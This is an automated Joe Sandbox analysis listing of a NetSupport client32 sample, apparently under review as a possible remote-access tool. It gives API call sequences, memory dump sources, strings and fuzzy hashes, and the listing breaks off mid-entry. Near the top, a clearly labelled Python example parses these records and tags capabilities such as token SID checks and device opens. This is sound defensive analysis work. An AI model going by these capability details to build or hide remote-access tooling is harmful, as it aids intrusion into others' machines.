• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
• String ID:
• API String ID: 1847508633-0
• Opcode ID: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
• Instruction ID: c591a5ba9c17bf4ee1841d59d592da31fd18a085fce33aa04bf57df4da238aa2
• Opcode Fuzzy Hash: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
• Instruction Fuzzy Hash: E4116175A4020CABEB14DF94CD42FE9F778AB48B04F5041D8E6246B1C0E7B02A48CBA5
APIs
• GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
• OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenUser),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenUser),?,00000001,00000001), ref: 1109ED84
  • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,111EFB64,?,00000001,00000001), ref: 1109EDB0
  • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,0094CB48,?,00000001,00000001), ref: 1109EDC3
• CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
• String ID:
• API String ID: 2256153495-0
• Opcode ID: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
• Instruction ID: 92f2080e931b07f8e3ae21524f42d2d018667502f077eef341ad82fca5e9a749
• Opcode Fuzzy Hash: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
• Instruction Fuzzy Hash: C8F05E74A01328EFDB08CFE5D99482EB7B8AF08748B40487DE429C3208D632DE00DF50
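The entries above are the raw per-function records Joe Sandbox emits: the API call sequence with call-site addresses, nested "Part of subcall" lines, the memory dump the function was lifted from, and a string list joined with "$". The Python below is an added example, not part of this report and not NetSupport code: it parses that listing into records, keeps drive-letter paths and \\.\ device names from the string field as IOC candidates, and applies a small set of capability rules to each API sequence. The sample input is constructed from three entries in this section (the \\.\NSWFPDrv open, the getsockname/inet_ntoa lookup, and the token SID comparison); the rule names and tagging heuristics are this example's own assumptions. On the token entry, information class 1 passed to GetTokenInformation is TokenUser, and AllocateAndInitializeSid with one sub-authority of 0x12 (18, SECURITY_LOCAL_SYSTEM_RID) followed by EqualSid compares the process's user SID with S-1-5-18 only if the identifier authority, which the listing does not show, is SECURITY_NT_AUTHORITY; the example therefore tags the sequence as a token identity check rather than asserting a LocalSystem comparison.

```python
"""Parse Joe Sandbox per-function listing entries into structured records.
Added example, not part of this report or of NetSupport: SAMPLE is constructed
from entries in this section, and the capability rules are this example's own."""
import re
from dataclasses import dataclass, field
from typing import List

# Constructed input: three entries as printed in the report; headings other than "APIs" omitted.
SAMPLE = """\
APIs
• CreateFileA.KERNEL32(\\\\.\\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102F66A,MiniDumpType,000000FF,00000000,00000000), ref: 11015597
• CloseHandle.KERNEL32(00000000,?,?,?,View,Client,Bridge), ref: 110155A8
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• API ID: CloseCreateFileHandle
• String ID: \\\\.\\NSWFPDrv
APIs
• _memset.LIBCMT ref: 6F9F8FE4
• getsockname.WSOCK32(?,?,00000010,?,03022F58,?), ref: 6F9F9005
• WSAGetLastError.WSOCK32(?,?,00000010,?,03022F58,?), ref: 6F9F902E
  • Part of subcall function 6F9F5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6F9F8F91,00000000,00000000,6FA3B8DA,?,00000080), ref: 6F9F5852
• Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
• API ID: ErrorLast_memsetgetsocknameinet_ntoa
• String ID:
APIs
• OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenUser),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
  • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,111EFB64,?,00000001,00000001), ref: 1109EDB0
  • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,0094CB48,?,00000001,00000001), ref: 1109EDC3
• CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
• String ID:
"""
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?(?P<api>[A-Za-z_]\w*)"
    r"\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str              # call-site address
    subcall_of: str = ""  # callee address when nested under "Part of subcall"

@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    image_base: str = ""  # "Offset:" of the dump the function was lifted from

def parse_entries(text: str) -> List[FunctionEntry]:
    # A new entry starts at each "APIs" heading; only bullet lines carry data.
    entries: List[FunctionEntry] = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
        elif cur is not None and (m := API_RE.match(line)):
            args = m.group("args").split(",") if m.group("args") is not None else []
            cur.calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                                     m.group("ref"), m.group("sub") or ""))
        elif cur is not None and (m := FIELD_RE.match(line)):
            key, val = m.group("key"), m.group("val")
            if key == "API ID":
                cur.api_id = val
            elif key == "String ID":
                cur.string_id = val
            elif key == "Source File":
                off = re.search(r"Offset:\s*([0-9A-F]+)", val)
                cur.image_base = off.group(1) if off else ""
    return entries

# Illustrative capability rules (this example's own, not Joe Sandbox output): a tag
# applies when every listed API occurs somewhere in the entry's call list.
CAPABILITY_RULES = {
    "token identity check": {"OpenProcessToken", "GetTokenInformation", "EqualSid"},
    "local socket address lookup": {"getsockname", "inet_ntoa"},
}

def tag_entry(entry: FunctionEntry) -> List[str]:
    names = {c.api for c in entry.calls}
    tags = sorted(t for t, need in CAPABILITY_RULES.items() if need <= names)
    # CreateFileA on a \\.\ path opens a device object, not a file.
    tags += ["device handle open: " + c.args[0] for c in entry.calls
             if c.api == "CreateFileA" and c.args and c.args[0].startswith("\\\\.\\")]
    return tags

def ioc_strings(entry: FunctionEntry) -> List[str]:
    # Joe Sandbox joins several strings with '$'; keep drive-letter paths and device names.
    return [p for p in entry.string_id.split("$") if re.match(r"^([A-Za-z]:\\|\\\\\.\\)", p)]

def summarize(text: str) -> List[dict]:
    return [{"base": e.image_base, "api_id": e.api_id, "sequence": [c.api for c in e.calls],
             "tags": tag_entry(e), "iocs": ioc_strings(e)} for e in parse_entries(text)]
```

summarize(SAMPLE) returns one record per entry; the first carries the \\.\NSWFPDrv device-open tag and IOC string, the second the socket lookup tag, and the third the token identity check tag with an empty IOC list. Feeding the full report listing through parse_entries gives the same records for every function, which is enough to diff API sequences across samples or to pull the client32.exe drop path out of the string fields.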
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11069542
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: ??CTL32.DLL
                                                                                  • API String ID: 1029625771-2984404022
                                                                                  • Opcode ID: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                  • Instruction ID: 80b6f585093910a847ce346e7da9e0444a9b2d99666d64fa09b423d85774157b
                                                                                  • Opcode Fuzzy Hash: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                  • Instruction Fuzzy Hash: 9331CF75A046519FE711CF58DC40BAAFBE8FF46724F0482AAE9199B780F771A800CB91
                                                                                  APIs
                                                                                  • inet_ntoa.WSOCK32(00000080,?,00000000,?,6F9F8F91,00000000,00000000,6FA3B8DA,?,00000080), ref: 6F9F5852
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: inet_ntoa
                                                                                  • String ID: gfff
                                                                                  • API String ID: 1879540557-1553575800
                                                                                  • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                  • Instruction ID: f687cd01b052ef21384b8bf52a6c7c7622107d9b0f7fc169061e4e309e3be314
                                                                                  • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                  • Instruction Fuzzy Hash: E51178226092D78BC31A8A2EA8606D6BFDDDF96250B188569D9C9CB341D621E80BC7D1
                                                                                  APIs
                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DriveType
                                                                                  • String ID: ?:\
                                                                                  • API String ID: 338552980-2533537817
                                                                                  • Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                  • Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
                                                                                  • Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                  • Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91
                                                                                  APIs
                                                                                    • Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                  • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                    • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                  Strings
                                                                                  • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenwvsprintf
                                                                                  • String ID: Error %d Opening regkey %s
                                                                                  • API String ID: 1772833024-3994271378
                                                                                  • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                  • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                                  • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                  • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                                  APIs
                                                                                  • RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                    • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                  Strings
                                                                                  • Error %d closing regkey %x, xrefs: 110ED4FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Closewvsprintf
                                                                                  • String ID: Error %d closing regkey %x
                                                                                  • API String ID: 843752472-892920262
                                                                                  • Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                  • Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
                                                                                  • Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                  • Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(NSMTRACE,?,1102E424,11026BE0,0264B8B0,?,?,?,00000100,?,?,00000009), ref: 11146FF9
                                                                                    • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: HandleLibraryLoadModule
                                                                                  • String ID: NSMTRACE
                                                                                  • API String ID: 4133054770-4175627554
                                                                                  • Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                  • Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
                                                                                  • Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                  • Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,11030964), ref: 110262C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: psapi.dll
                                                                                  • API String ID: 1029625771-80456845
                                                                                  • Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                  • Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
                                                                                  • Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                  • Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,6F9F8DC8), ref: 6F9F4F78
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: psapi.dll
                                                                                  • API String ID: 1029625771-80456845
APIs
• LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102F63D,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1101553E
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: nslsp.dll
• API String ID: 1029625771-3933918195
APIs
• _memset.LIBCMT ref: 110750EF
• FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: FreeLibrary_memset
• String ID:
• API String ID: 1654520187-0
APIs
• ioctlsocket.WSOCK32(905C34B3,4004667F,00000000,-000397EB), ref: 6F9F5D1F
• select.WSOCK32(00000001,?,00000000,?,00000000,905C34B3,4004667F,00000000,-000397EB), ref: 6F9F5D62
Memory Dump Source
• Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
Yara matches
Similarity
• API ID: ioctlsocketselect
• String ID:
• API String ID: 1457273030-0
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• std::exception::exception.LIBCMT ref: 110608C3
• __CxxThrowException@8.LIBCMT ref: 110608D8
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
• String ID:
• API String ID: 1338273076-0
APIs
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _malloc_memmove
• String ID:
• API String ID: 1183979061-0
APIs
• _memset.LIBCMT ref: 110886DF
• InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection_memset
• String ID:
• API String ID: 453477542-0
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
• ExtractIconExA.SHELL32(?,00000000,00020453,00020461,00000001), ref: 11145068
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ExtractFileIconModuleName
• String ID:
• API String ID: 3911389742-0
                                                                                  • Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                  • Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
                                                                                  • Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                  • Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
                                                                                  APIs
                                                                                    • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                  • __lock_file.LIBCMT ref: 11164CBE
                                                                                    • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
                                                                                  • __fclose_nolock.LIBCMT ref: 11164CC9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2800547568-0
                                                                                  • Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                  • Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
                                                                                  • Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                  • Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 6FA06C26
                                                                                  • Sleep.KERNEL32(00000064), ref: 6FA06C5B
                                                                                    • Part of subcall function 6FA06940: GetTickCount.KERNEL32 ref: 6FA06950
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 4250438611-0
                                                                                  • Opcode ID: 4d0de41c783a87a321e98a65f9e0295b613237ff59179cafe58a3bf4f3353a93
                                                                                  • Instruction ID: 47196906f946b2cf5de388dc1f1c61257249c76ac37dd43267ecc97bce6b5705
                                                                                  • Opcode Fuzzy Hash: 4d0de41c783a87a321e98a65f9e0295b613237ff59179cafe58a3bf4f3353a93
                                                                                  • Instruction Fuzzy Hash: DAF03033A14B048BCF24EE74BE54758B292DB5336DF15812BC512D5B90C778A8E2C741
                                                                                  APIs
                                                                                  • __lock.LIBCMT ref: 11176045
                                                                                    • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                    • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                    • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                                  • __tzset_nolock.LIBCMT ref: 11176056
                                                                                    • Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
                                                                                    • Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
                                                                                    • Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
                                                                                    • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
                                                                                    • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
                                                                                    • Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
                                                                                    • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
                                                                                    • Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
                                                                                    • Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
                                                                                    • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 1828324828-0
                                                                                  • Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                  • Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
                                                                                  • Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                  • Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792
                                                                                  APIs
                                                                                  • WSACancelBlockingCall.WSOCK32 ref: 6F9F63A9
                                                                                  • Sleep.KERNEL32(00000032), ref: 6F9F63B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
